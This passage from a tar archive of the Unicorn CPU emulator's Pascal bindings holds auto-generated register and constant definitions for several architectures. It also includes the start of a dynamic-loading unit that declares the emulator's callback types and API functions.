UC_RISCV_REG_HCOUNTEREN = 151; UC_RISCV_REG_HTVAL = 152; UC_RISCV_REG_HIP = 153; UC_RISCV_REG_HTINST = 154; UC_RISCV_REG_HGATP = 155; UC_RISCV_REG_HTIMEDELTA = 156; UC_RISCV_REG_HTIMEDELTAH = 157; // Floating-point registers UC_RISCV_REG_F0 = 158; UC_RISCV_REG_F1 = 159; UC_RISCV_REG_F2 = 160; UC_RISCV_REG_F3 = 161; UC_RISCV_REG_F4 = 162; UC_RISCV_REG_F5 = 163; UC_RISCV_REG_F6 = 164; UC_RISCV_REG_F7 = 165; UC_RISCV_REG_F8 = 166; UC_RISCV_REG_F9 = 167; UC_RISCV_REG_F10 = 168; UC_RISCV_REG_F11 = 169; UC_RISCV_REG_F12 = 170; UC_RISCV_REG_F13 = 171; UC_RISCV_REG_F14 = 172; UC_RISCV_REG_F15 = 173; UC_RISCV_REG_F16 = 174; UC_RISCV_REG_F17 = 175; UC_RISCV_REG_F18 = 176; UC_RISCV_REG_F19 = 177; UC_RISCV_REG_F20 = 178; UC_RISCV_REG_F21 = 179; UC_RISCV_REG_F22 = 180; UC_RISCV_REG_F23 = 181; UC_RISCV_REG_F24 = 182; UC_RISCV_REG_F25 = 183; UC_RISCV_REG_F26 = 184; UC_RISCV_REG_F27 = 185; UC_RISCV_REG_F28 = 186; UC_RISCV_REG_F29 = 187; UC_RISCV_REG_F30 = 188; UC_RISCV_REG_F31 = 189; UC_RISCV_REG_PC = 190; UC_RISCV_REG_ENDING = 191; // Alias registers UC_RISCV_REG_ZERO = 1; UC_RISCV_REG_RA = 2; UC_RISCV_REG_SP = 3; UC_RISCV_REG_GP = 4; UC_RISCV_REG_TP = 5; UC_RISCV_REG_T0 = 6; UC_RISCV_REG_T1 = 7; UC_RISCV_REG_T2 = 8; UC_RISCV_REG_S0 = 9; UC_RISCV_REG_FP = 9; UC_RISCV_REG_S1 = 10; UC_RISCV_REG_A0 = 11; UC_RISCV_REG_A1 = 12; UC_RISCV_REG_A2 = 13; UC_RISCV_REG_A3 = 14; UC_RISCV_REG_A4 = 15; UC_RISCV_REG_A5 = 16; UC_RISCV_REG_A6 = 17; UC_RISCV_REG_A7 = 18; UC_RISCV_REG_S2 = 19; UC_RISCV_REG_S3 = 20; UC_RISCV_REG_S4 = 21; UC_RISCV_REG_S5 = 22; UC_RISCV_REG_S6 = 23; UC_RISCV_REG_S7 = 24; UC_RISCV_REG_S8 = 25; UC_RISCV_REG_S9 = 26; UC_RISCV_REG_S10 = 27; UC_RISCV_REG_S11 = 28; UC_RISCV_REG_T3 = 29; UC_RISCV_REG_T4 = 30; UC_RISCV_REG_T5 = 31; UC_RISCV_REG_T6 = 32; UC_RISCV_REG_FT0 = 158; UC_RISCV_REG_FT1 = 159; UC_RISCV_REG_FT2 = 160; UC_RISCV_REG_FT3 = 161; UC_RISCV_REG_FT4 = 162; UC_RISCV_REG_FT5 = 163; UC_RISCV_REG_FT6 = 164; UC_RISCV_REG_FT7 = 165; UC_RISCV_REG_FS0 = 166; UC_RISCV_REG_FS1 = 167; UC_RISCV_REG_FA0 = 168; UC_RISCV_REG_FA1 = 169; UC_RISCV_REG_FA2 = 170; UC_RISCV_REG_FA3 = 171; UC_RISCV_REG_FA4 = 172; UC_RISCV_REG_FA5 = 173; UC_RISCV_REG_FA6 = 174; UC_RISCV_REG_FA7 = 175; UC_RISCV_REG_FS2 = 176; UC_RISCV_REG_FS3 = 177; UC_RISCV_REG_FS4 = 178; UC_RISCV_REG_FS5 = 179; UC_RISCV_REG_FS6 = 180; UC_RISCV_REG_FS7 = 181; UC_RISCV_REG_FS8 = 182; UC_RISCV_REG_FS9 = 183; UC_RISCV_REG_FS10 = 184; UC_RISCV_REG_FS11 = 185; UC_RISCV_REG_FT8 = 186; UC_RISCV_REG_FT9 = 187; UC_RISCV_REG_FT10 = 188; UC_RISCV_REG_FT11 = 189; implementation end.�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/S390xConst.pas������������������������������������������������0000664�0000000�0000000�00000005625�14675241067�0022273�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit S390xConst; interface const // S390X CPU UC_CPU_S390X_Z900 = 0; UC_CPU_S390X_Z900_2 = 1; UC_CPU_S390X_Z900_3 = 2; UC_CPU_S390X_Z800 = 3; UC_CPU_S390X_Z990 = 4; UC_CPU_S390X_Z990_2 = 5; UC_CPU_S390X_Z990_3 = 6; UC_CPU_S390X_Z890 = 7; UC_CPU_S390X_Z990_4 = 8; UC_CPU_S390X_Z890_2 = 9; UC_CPU_S390X_Z990_5 = 10; UC_CPU_S390X_Z890_3 = 11; UC_CPU_S390X_Z9EC = 12; UC_CPU_S390X_Z9EC_2 = 13; UC_CPU_S390X_Z9BC = 14; UC_CPU_S390X_Z9EC_3 = 15; UC_CPU_S390X_Z9BC_2 = 16; UC_CPU_S390X_Z10EC = 17; UC_CPU_S390X_Z10EC_2 = 18; UC_CPU_S390X_Z10BC = 19; UC_CPU_S390X_Z10EC_3 = 20; UC_CPU_S390X_Z10BC_2 = 21; UC_CPU_S390X_Z196 = 22; UC_CPU_S390X_Z196_2 = 23; UC_CPU_S390X_Z114 = 24; UC_CPU_S390X_ZEC12 = 25; UC_CPU_S390X_ZEC12_2 = 26; UC_CPU_S390X_ZBC12 = 27; UC_CPU_S390X_Z13 = 28; UC_CPU_S390X_Z13_2 = 29; UC_CPU_S390X_Z13S = 30; UC_CPU_S390X_Z14 = 31; UC_CPU_S390X_Z14_2 = 32; UC_CPU_S390X_Z14ZR1 = 33; UC_CPU_S390X_GEN15A = 34; UC_CPU_S390X_GEN15B = 35; UC_CPU_S390X_QEMU = 36; UC_CPU_S390X_MAX = 37; UC_CPU_S390X_ENDING = 38; // S390X registers UC_S390X_REG_INVALID = 0; // General purpose registers UC_S390X_REG_R0 = 1; UC_S390X_REG_R1 = 2; UC_S390X_REG_R2 = 3; UC_S390X_REG_R3 = 4; UC_S390X_REG_R4 = 5; UC_S390X_REG_R5 = 6; UC_S390X_REG_R6 = 7; UC_S390X_REG_R7 = 8; UC_S390X_REG_R8 = 9; UC_S390X_REG_R9 = 10; UC_S390X_REG_R10 = 11; UC_S390X_REG_R11 = 12; UC_S390X_REG_R12 = 13; UC_S390X_REG_R13 = 14; UC_S390X_REG_R14 = 15; UC_S390X_REG_R15 = 16; // Floating point registers UC_S390X_REG_F0 = 17; UC_S390X_REG_F1 = 18; UC_S390X_REG_F2 = 19; UC_S390X_REG_F3 = 20; UC_S390X_REG_F4 = 21; UC_S390X_REG_F5 = 22; UC_S390X_REG_F6 = 23; UC_S390X_REG_F7 = 24; UC_S390X_REG_F8 = 25; UC_S390X_REG_F9 = 26; UC_S390X_REG_F10 = 27; UC_S390X_REG_F11 = 28; UC_S390X_REG_F12 = 29; UC_S390X_REG_F13 = 30; UC_S390X_REG_F14 = 31; UC_S390X_REG_F15 = 32; UC_S390X_REG_F16 = 33; UC_S390X_REG_F17 = 34; UC_S390X_REG_F18 = 35; UC_S390X_REG_F19 = 36; UC_S390X_REG_F20 = 37; UC_S390X_REG_F21 = 38; UC_S390X_REG_F22 = 39; UC_S390X_REG_F23 = 40; UC_S390X_REG_F24 = 41; UC_S390X_REG_F25 = 42; UC_S390X_REG_F26 = 43; UC_S390X_REG_F27 = 44; UC_S390X_REG_F28 = 45; UC_S390X_REG_F29 = 46; UC_S390X_REG_F30 = 47; UC_S390X_REG_F31 = 48; // Access registers UC_S390X_REG_A0 = 49; UC_S390X_REG_A1 = 50; UC_S390X_REG_A2 = 51; UC_S390X_REG_A3 = 52; UC_S390X_REG_A4 = 53; UC_S390X_REG_A5 = 54; UC_S390X_REG_A6 = 55; UC_S390X_REG_A7 = 56; UC_S390X_REG_A8 = 57; UC_S390X_REG_A9 = 58; UC_S390X_REG_A10 = 59; UC_S390X_REG_A11 = 60; UC_S390X_REG_A12 = 61; UC_S390X_REG_A13 = 62; UC_S390X_REG_A14 = 63; UC_S390X_REG_A15 = 64; UC_S390X_REG_PC = 65; UC_S390X_REG_PSWM = 66; UC_S390X_REG_ENDING = 67; // Alias registers implementation end.�����������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/SparcConst.pas������������������������������������������������0000664�0000000�0000000�00000007066�14675241067�0022516�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit SparcConst; interface const // SPARC32 CPU UC_CPU_SPARC32_FUJITSU_MB86904 = 0; UC_CPU_SPARC32_FUJITSU_MB86907 = 1; UC_CPU_SPARC32_TI_MICROSPARC_I = 2; UC_CPU_SPARC32_TI_MICROSPARC_II = 3; UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4; UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5; UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6; UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7; UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8; UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9; UC_CPU_SPARC32_TI_SUPERSPARC_II = 10; UC_CPU_SPARC32_LEON2 = 11; UC_CPU_SPARC32_LEON3 = 12; UC_CPU_SPARC32_ENDING = 13; // SPARC64 CPU UC_CPU_SPARC64_FUJITSU = 0; UC_CPU_SPARC64_FUJITSU_III = 1; UC_CPU_SPARC64_FUJITSU_IV = 2; UC_CPU_SPARC64_FUJITSU_V = 3; UC_CPU_SPARC64_TI_ULTRASPARC_I = 4; UC_CPU_SPARC64_TI_ULTRASPARC_II = 5; UC_CPU_SPARC64_TI_ULTRASPARC_III = 6; UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7; UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8; UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9; UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10; UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11; UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12; UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13; UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14; UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15; UC_CPU_SPARC64_NEC_ULTRASPARC_I = 16; UC_CPU_SPARC64_ENDING = 17; // SPARC registers UC_SPARC_REG_INVALID = 0; UC_SPARC_REG_F0 = 1; UC_SPARC_REG_F1 = 2; UC_SPARC_REG_F2 = 3; UC_SPARC_REG_F3 = 4; UC_SPARC_REG_F4 = 5; UC_SPARC_REG_F5 = 6; UC_SPARC_REG_F6 = 7; UC_SPARC_REG_F7 = 8; UC_SPARC_REG_F8 = 9; UC_SPARC_REG_F9 = 10; UC_SPARC_REG_F10 = 11; UC_SPARC_REG_F11 = 12; UC_SPARC_REG_F12 = 13; UC_SPARC_REG_F13 = 14; UC_SPARC_REG_F14 = 15; UC_SPARC_REG_F15 = 16; UC_SPARC_REG_F16 = 17; UC_SPARC_REG_F17 = 18; UC_SPARC_REG_F18 = 19; UC_SPARC_REG_F19 = 20; UC_SPARC_REG_F20 = 21; UC_SPARC_REG_F21 = 22; UC_SPARC_REG_F22 = 23; UC_SPARC_REG_F23 = 24; UC_SPARC_REG_F24 = 25; UC_SPARC_REG_F25 = 26; UC_SPARC_REG_F26 = 27; UC_SPARC_REG_F27 = 28; UC_SPARC_REG_F28 = 29; UC_SPARC_REG_F29 = 30; UC_SPARC_REG_F30 = 31; UC_SPARC_REG_F31 = 32; UC_SPARC_REG_F32 = 33; UC_SPARC_REG_F34 = 34; UC_SPARC_REG_F36 = 35; UC_SPARC_REG_F38 = 36; UC_SPARC_REG_F40 = 37; UC_SPARC_REG_F42 = 38; UC_SPARC_REG_F44 = 39; UC_SPARC_REG_F46 = 40; UC_SPARC_REG_F48 = 41; UC_SPARC_REG_F50 = 42; UC_SPARC_REG_F52 = 43; UC_SPARC_REG_F54 = 44; UC_SPARC_REG_F56 = 45; UC_SPARC_REG_F58 = 46; UC_SPARC_REG_F60 = 47; UC_SPARC_REG_F62 = 48; UC_SPARC_REG_FCC0 = 49; UC_SPARC_REG_FCC1 = 50; UC_SPARC_REG_FCC2 = 51; UC_SPARC_REG_FCC3 = 52; UC_SPARC_REG_G0 = 53; UC_SPARC_REG_G1 = 54; UC_SPARC_REG_G2 = 55; UC_SPARC_REG_G3 = 56; UC_SPARC_REG_G4 = 57; UC_SPARC_REG_G5 = 58; UC_SPARC_REG_G6 = 59; UC_SPARC_REG_G7 = 60; UC_SPARC_REG_I0 = 61; UC_SPARC_REG_I1 = 62; UC_SPARC_REG_I2 = 63; UC_SPARC_REG_I3 = 64; UC_SPARC_REG_I4 = 65; UC_SPARC_REG_I5 = 66; UC_SPARC_REG_FP = 67; UC_SPARC_REG_I7 = 68; UC_SPARC_REG_ICC = 69; UC_SPARC_REG_L0 = 70; UC_SPARC_REG_L1 = 71; UC_SPARC_REG_L2 = 72; UC_SPARC_REG_L3 = 73; UC_SPARC_REG_L4 = 74; UC_SPARC_REG_L5 = 75; UC_SPARC_REG_L6 = 76; UC_SPARC_REG_L7 = 77; UC_SPARC_REG_O0 = 78; UC_SPARC_REG_O1 = 79; UC_SPARC_REG_O2 = 80; UC_SPARC_REG_O3 = 81; UC_SPARC_REG_O4 = 82; UC_SPARC_REG_O5 = 83; UC_SPARC_REG_SP = 84; UC_SPARC_REG_O7 = 85; UC_SPARC_REG_Y = 86; UC_SPARC_REG_XCC = 87; UC_SPARC_REG_PC = 88; UC_SPARC_REG_ENDING = 89; UC_SPARC_REG_O6 = 84; UC_SPARC_REG_I6 = 67; implementation end.��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/TriCoreConst.pas����������������������������������������������0000664�0000000�0000000�00000006613�14675241067�0023012�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit TriCoreConst; interface const // TRICORE CPU UC_CPU_TRICORE_TC1796 = 0; UC_CPU_TRICORE_TC1797 = 1; UC_CPU_TRICORE_TC27X = 2; UC_CPU_TRICORE_ENDING = 3; // TRICORE registers UC_TRICORE_REG_INVALID = 0; UC_TRICORE_REG_A0 = 1; UC_TRICORE_REG_A1 = 2; UC_TRICORE_REG_A2 = 3; UC_TRICORE_REG_A3 = 4; UC_TRICORE_REG_A4 = 5; UC_TRICORE_REG_A5 = 6; UC_TRICORE_REG_A6 = 7; UC_TRICORE_REG_A7 = 8; UC_TRICORE_REG_A8 = 9; UC_TRICORE_REG_A9 = 10; UC_TRICORE_REG_A10 = 11; UC_TRICORE_REG_A11 = 12; UC_TRICORE_REG_A12 = 13; UC_TRICORE_REG_A13 = 14; UC_TRICORE_REG_A14 = 15; UC_TRICORE_REG_A15 = 16; UC_TRICORE_REG_D0 = 17; UC_TRICORE_REG_D1 = 18; UC_TRICORE_REG_D2 = 19; UC_TRICORE_REG_D3 = 20; UC_TRICORE_REG_D4 = 21; UC_TRICORE_REG_D5 = 22; UC_TRICORE_REG_D6 = 23; UC_TRICORE_REG_D7 = 24; UC_TRICORE_REG_D8 = 25; UC_TRICORE_REG_D9 = 26; UC_TRICORE_REG_D10 = 27; UC_TRICORE_REG_D11 = 28; UC_TRICORE_REG_D12 = 29; UC_TRICORE_REG_D13 = 30; UC_TRICORE_REG_D14 = 31; UC_TRICORE_REG_D15 = 32; UC_TRICORE_REG_PCXI = 33; UC_TRICORE_REG_PSW = 34; UC_TRICORE_REG_PSW_USB_C = 35; UC_TRICORE_REG_PSW_USB_V = 36; UC_TRICORE_REG_PSW_USB_SV = 37; UC_TRICORE_REG_PSW_USB_AV = 38; UC_TRICORE_REG_PSW_USB_SAV = 39; UC_TRICORE_REG_PC = 40; UC_TRICORE_REG_SYSCON = 41; UC_TRICORE_REG_CPU_ID = 42; UC_TRICORE_REG_BIV = 43; UC_TRICORE_REG_BTV = 44; UC_TRICORE_REG_ISP = 45; UC_TRICORE_REG_ICR = 46; UC_TRICORE_REG_FCX = 47; UC_TRICORE_REG_LCX = 48; UC_TRICORE_REG_COMPAT = 49; UC_TRICORE_REG_DPR0_U = 50; UC_TRICORE_REG_DPR1_U = 51; UC_TRICORE_REG_DPR2_U = 52; UC_TRICORE_REG_DPR3_U = 53; UC_TRICORE_REG_DPR0_L = 54; UC_TRICORE_REG_DPR1_L = 55; UC_TRICORE_REG_DPR2_L = 56; UC_TRICORE_REG_DPR3_L = 57; UC_TRICORE_REG_CPR0_U = 58; UC_TRICORE_REG_CPR1_U = 59; UC_TRICORE_REG_CPR2_U = 60; UC_TRICORE_REG_CPR3_U = 61; UC_TRICORE_REG_CPR0_L = 62; UC_TRICORE_REG_CPR1_L = 63; UC_TRICORE_REG_CPR2_L = 64; UC_TRICORE_REG_CPR3_L = 65; UC_TRICORE_REG_DPM0 = 66; UC_TRICORE_REG_DPM1 = 67; UC_TRICORE_REG_DPM2 = 68; UC_TRICORE_REG_DPM3 = 69; UC_TRICORE_REG_CPM0 = 70; UC_TRICORE_REG_CPM1 = 71; UC_TRICORE_REG_CPM2 = 72; UC_TRICORE_REG_CPM3 = 73; UC_TRICORE_REG_MMU_CON = 74; UC_TRICORE_REG_MMU_ASI = 75; UC_TRICORE_REG_MMU_TVA = 76; UC_TRICORE_REG_MMU_TPA = 77; UC_TRICORE_REG_MMU_TPX = 78; UC_TRICORE_REG_MMU_TFA = 79; UC_TRICORE_REG_BMACON = 80; UC_TRICORE_REG_SMACON = 81; UC_TRICORE_REG_DIEAR = 82; UC_TRICORE_REG_DIETR = 83; UC_TRICORE_REG_CCDIER = 84; UC_TRICORE_REG_MIECON = 85; UC_TRICORE_REG_PIEAR = 86; UC_TRICORE_REG_PIETR = 87; UC_TRICORE_REG_CCPIER = 88; UC_TRICORE_REG_DBGSR = 89; UC_TRICORE_REG_EXEVT = 90; UC_TRICORE_REG_CREVT = 91; UC_TRICORE_REG_SWEVT = 92; UC_TRICORE_REG_TR0EVT = 93; UC_TRICORE_REG_TR1EVT = 94; UC_TRICORE_REG_DMS = 95; UC_TRICORE_REG_DCX = 96; UC_TRICORE_REG_DBGTCR = 97; UC_TRICORE_REG_CCTRL = 98; UC_TRICORE_REG_CCNT = 99; UC_TRICORE_REG_ICNT = 100; UC_TRICORE_REG_M1CNT = 101; UC_TRICORE_REG_M2CNT = 102; UC_TRICORE_REG_M3CNT = 103; UC_TRICORE_REG_ENDING = 104; UC_TRICORE_REG_GA0 = 1; UC_TRICORE_REG_GA1 = 2; UC_TRICORE_REG_GA8 = 9; UC_TRICORE_REG_GA9 = 10; UC_TRICORE_REG_SP = 11; UC_TRICORE_REG_LR = 12; UC_TRICORE_REG_IA = 16; UC_TRICORE_REG_ID = 32; implementation end.���������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/UnicornConst.pas����������������������������������������������0000664�0000000�0000000�00000006762�14675241067�0023065�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit UnicornConst; interface const UC_API_MAJOR = 2; UC_API_MINOR = 1; UC_API_PATCH = 0; UC_API_EXTRA = 255; UC_VERSION_MAJOR = 2; UC_VERSION_MINOR = 1; UC_VERSION_PATCH = 0; UC_VERSION_EXTRA = 255; UC_SECOND_SCALE = 1000000; UC_MILISECOND_SCALE = 1000; UC_ARCH_ARM = 1; UC_ARCH_ARM64 = 2; UC_ARCH_MIPS = 3; UC_ARCH_X86 = 4; UC_ARCH_PPC = 5; UC_ARCH_SPARC = 6; UC_ARCH_M68K = 7; UC_ARCH_RISCV = 8; UC_ARCH_S390X = 9; UC_ARCH_TRICORE = 10; UC_ARCH_MAX = 11; UC_MODE_LITTLE_ENDIAN = 0; UC_MODE_BIG_ENDIAN = 1073741824; UC_MODE_ARM = 0; UC_MODE_THUMB = 16; UC_MODE_MCLASS = 32; UC_MODE_V8 = 64; UC_MODE_ARMBE8 = 1024; UC_MODE_ARM926 = 128; UC_MODE_ARM946 = 256; UC_MODE_ARM1176 = 512; UC_MODE_MICRO = 16; UC_MODE_MIPS3 = 32; UC_MODE_MIPS32R6 = 64; UC_MODE_MIPS32 = 4; UC_MODE_MIPS64 = 8; UC_MODE_16 = 2; UC_MODE_32 = 4; UC_MODE_64 = 8; UC_MODE_PPC32 = 4; UC_MODE_PPC64 = 8; UC_MODE_QPX = 16; UC_MODE_SPARC32 = 4; UC_MODE_SPARC64 = 8; UC_MODE_V9 = 16; UC_MODE_RISCV32 = 4; UC_MODE_RISCV64 = 8; UC_ERR_OK = 0; UC_ERR_NOMEM = 1; UC_ERR_ARCH = 2; UC_ERR_HANDLE = 3; UC_ERR_MODE = 4; UC_ERR_VERSION = 5; UC_ERR_READ_UNMAPPED = 6; UC_ERR_WRITE_UNMAPPED = 7; UC_ERR_FETCH_UNMAPPED = 8; UC_ERR_HOOK = 9; UC_ERR_INSN_INVALID = 10; UC_ERR_MAP = 11; UC_ERR_WRITE_PROT = 12; UC_ERR_READ_PROT = 13; UC_ERR_FETCH_PROT = 14; UC_ERR_ARG = 15; UC_ERR_READ_UNALIGNED = 16; UC_ERR_WRITE_UNALIGNED = 17; UC_ERR_FETCH_UNALIGNED = 18; UC_ERR_HOOK_EXIST = 19; UC_ERR_RESOURCE = 20; UC_ERR_EXCEPTION = 21; UC_ERR_OVERFLOW = 22; UC_MEM_READ = 16; UC_MEM_WRITE = 17; UC_MEM_FETCH = 18; UC_MEM_READ_UNMAPPED = 19; UC_MEM_WRITE_UNMAPPED = 20; UC_MEM_FETCH_UNMAPPED = 21; UC_MEM_WRITE_PROT = 22; UC_MEM_READ_PROT = 23; UC_MEM_FETCH_PROT = 24; UC_MEM_READ_AFTER = 25; UC_TCG_OP_SUB = 0; UC_TCG_OP_FLAG_CMP = 1; UC_TCG_OP_FLAG_DIRECT = 2; UC_HOOK_INTR = 1; UC_HOOK_INSN = 2; UC_HOOK_CODE = 4; UC_HOOK_BLOCK = 8; UC_HOOK_MEM_READ_UNMAPPED = 16; UC_HOOK_MEM_WRITE_UNMAPPED = 32; UC_HOOK_MEM_FETCH_UNMAPPED = 64; UC_HOOK_MEM_READ_PROT = 128; UC_HOOK_MEM_WRITE_PROT = 256; UC_HOOK_MEM_FETCH_PROT = 512; UC_HOOK_MEM_READ = 1024; UC_HOOK_MEM_WRITE = 2048; UC_HOOK_MEM_FETCH = 4096; UC_HOOK_MEM_READ_AFTER = 8192; UC_HOOK_INSN_INVALID = 16384; UC_HOOK_EDGE_GENERATED = 32768; UC_HOOK_TCG_OPCODE = 65536; UC_HOOK_TLB_FILL = 131072; UC_HOOK_MEM_UNMAPPED = 112; UC_HOOK_MEM_PROT = 896; UC_HOOK_MEM_READ_INVALID = 144; UC_HOOK_MEM_WRITE_INVALID = 288; UC_HOOK_MEM_FETCH_INVALID = 576; UC_HOOK_MEM_INVALID = 1008; UC_HOOK_MEM_VALID = 7168; UC_QUERY_MODE = 1; UC_QUERY_PAGE_SIZE = 2; UC_QUERY_ARCH = 3; UC_QUERY_TIMEOUT = 4; UC_CTL_IO_NONE = 0; UC_CTL_IO_WRITE = 1; UC_CTL_IO_READ = 2; UC_CTL_IO_READ_WRITE = 3; UC_TLB_CPU = 0; UC_TLB_VIRTUAL = 1; UC_CTL_UC_MODE = 0; UC_CTL_UC_PAGE_SIZE = 1; UC_CTL_UC_ARCH = 2; UC_CTL_UC_TIMEOUT = 3; UC_CTL_UC_USE_EXITS = 4; UC_CTL_UC_EXITS_CNT = 5; UC_CTL_UC_EXITS = 6; UC_CTL_CPU_MODEL = 7; UC_CTL_TB_REQUEST_CACHE = 8; UC_CTL_TB_REMOVE_CACHE = 9; UC_CTL_TB_FLUSH = 10; UC_CTL_TLB_FLUSH = 11; UC_CTL_TLB_TYPE = 12; UC_CTL_TCG_BUFFER_SIZE = 13; UC_CTL_CONTEXT_MODE = 14; UC_PROT_NONE = 0; UC_PROT_READ = 1; UC_PROT_WRITE = 2; UC_PROT_EXEC = 4; UC_PROT_ALL = 7; UC_CTL_CONTEXT_CPU = 1; UC_CTL_CONTEXT_MEMORY = 2; implementation end.��������������unicorn-2.1.1/bindings/pascal/unicorn/Unicorn_dyn.pas�����������������������������������������������0000775�0000000�0000000�00000057150�14675241067�0022730�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������{ FreePascal/Delphi bindings for the UnicornEngine Emulator Engine \ Tested On Mac - Win - Linux >> with FreePascal v3.0.4 & Delphi Berlin 10.2 . Copyright(c) 2018 Coldzer0 <Coldzer0 [at] protonmail.ch> . License: GPLv2 . } unit Unicorn_dyn; {$IFDEF FPC} {$MODE Delphi} {$PackRecords C} {$ENDIF} interface uses {$IFDEF FPC}dynlibs,Crt{$ELSE} {$ifdef mswindows} windows,sysutils {$ENDIF} {$ENDIF}; const {$IFDEF Darwin} UNICORN_LIB = './libunicorn.dylib'; {$ENDIF} {$ifdef Linux} UNICORN_LIB = './libunicorn.so'; {$endif} {$ifdef mswindows} UNICORN_LIB = './unicorn.dll'; {$endif} type uc_engine = Pointer; uc_context = Pointer; // Opaque storage for CPU context, used with uc_context_*() uc_hook = UIntPtr; uc_arch = Cardinal; uc_mode = Cardinal; uc_err = Cardinal; uc_query_type = Cardinal; {$IFNDEF FPC} // Delphi Support . PUInt32 = ^UInt32; {$ENDIF} type { Callback functions Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) @address: address where the code is being executed @size: size of machine instruction(s) being executed, or 0 when size is unknown @user_data: user data passed to tracing APIs. } uc_cb_hookcode_t = procedure(uc : uc_engine; address : UInt64; size : UInt32; user_data : Pointer); cdecl; { Callback function for tracing interrupts (for uc_hook_intr()) @intno: interrupt number @user_data: user data passed to tracing APIs. } uc_cb_hookintr_t = procedure(uc : uc_engine; intno : UInt32; user_data : Pointer); cdecl; { Callback function for tracing IN instruction of X86 @port: port number @size: data size (1/2/4) to be read from this port @user_data: user data passed to tracing APIs. } uc_cb_insn_in_t = function(uc : uc_engine; port : UInt32; siz : integer; user_data : Pointer) : UInt32; cdecl; { Callback function for OUT instruction of X86 . @port: port number @size: data size (1/2/4) to be written to this port @value: data value to be written to this port } uc_cb_insn_out_t = procedure(uc : uc_engine; port : UInt32; size : integer; value : UInt32; user_data : Pointer); cdecl; // All type of memory accesses for UC_HOOK_MEM_* uc_mem_type = integer; // All type of hooks for uc_hook_add() API. uc_hook_type = integer; { Callback function for hooking memory (UC_MEM_READ, UC_MEM_WRITE & UC_MEM_FETCH) @type: this memory is being READ, or WRITE @address: address where the code is being executed @size: size of data being read or written @value: value of data being written to memory, or irrelevant if type = READ. @user_data: user data passed to tracing APIs } uc_cb_hookmem_t = procedure(uc : uc_engine; _type : uc_mem_type; address : UInt64; size : integer; value : Int64; user_data : Pointer); cdecl; { Callback function for handling invalid memory access events (UNMAPPED and PROT events) @type: this memory is being READ, or WRITE @address: address where the code is being executed @size: size of data being read or written @value: value of data being written to memory, or irrelevant if type = READ. @user_data: user data passed to tracing APIs @return: return true to continue, or false to stop program (due to invalid memory). NOTE: returning true to continue execution will only work if the accessed memory is made accessible with the correct permissions during the hook. In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback, the memory should be uc_mem_map()-ed with the correct permissions, and the instruction will then read or write to the address as it was supposed to. In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped in as executable, in which case execution will resume from the fetched address. The instruction pointer may be written to in order to change where execution resumes, but the fetch must succeed if execution is to resume. } uc_cb_eventmem_t = function(uc : uc_engine; _type : uc_mem_type; address : UInt64; size : integer; value : Int64; user_data : Pointer) : LongBool; cdecl; type { Memory region mapped by uc_mem_map() and uc_mem_map_ptr() Retrieve the list of memory regions with uc_mem_regions() } uc_mem_region = record rBegin : UInt64; // begin address of the region (inclusive) rEnd : UInt64; // end address of the region (inclusive) rPerms : UInt32; // memory permissions of the region end; uc_mem_regionArray = array[0..(MaxInt div SizeOf(uc_mem_region))-1] of uc_mem_region; Puc_mem_regionArray = ^uc_mem_regionArray; // Exports var (* Return combined API version & major and minor version numbers. @major: major number of API version @minor: minor number of API version @return hexical number as (major << 8 | minor), which encodes both major & minor versions. NOTE: This returned value can be compared with version number made with macro UC_MAKE_VERSION . For example, second API version would return 1 in @major, and 1 in @minor The return value would be 0x0101 NOTE: if you only care about returned value, but not major and minor values, set both @major & @minor arguments to NULL. *) uc_version : function (var major, minor : Cardinal) : Cardinal; cdecl; (* Determine if the given architecture is supported by this library. @arch: architecture type (UC_ARCH_* ) @return True if this library supports the given arch. *) uc_arch_supported : function (arch : uc_arch) : LongBool; cdecl; (* Create new instance of unicorn engine. @arch: architecture type (UC_ARCH_* ) @mode: hardware mode. This is combined of UC_MODE_* @uc: pointer to uc_engine, which will be updated at return time @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum for detailed error). *) uc_open : function (arch : uc_arch; mode : uc_mode; var uc : uc_engine) : uc_err; cdecl; (* Close UC instance: MUST do to release the handle when it is 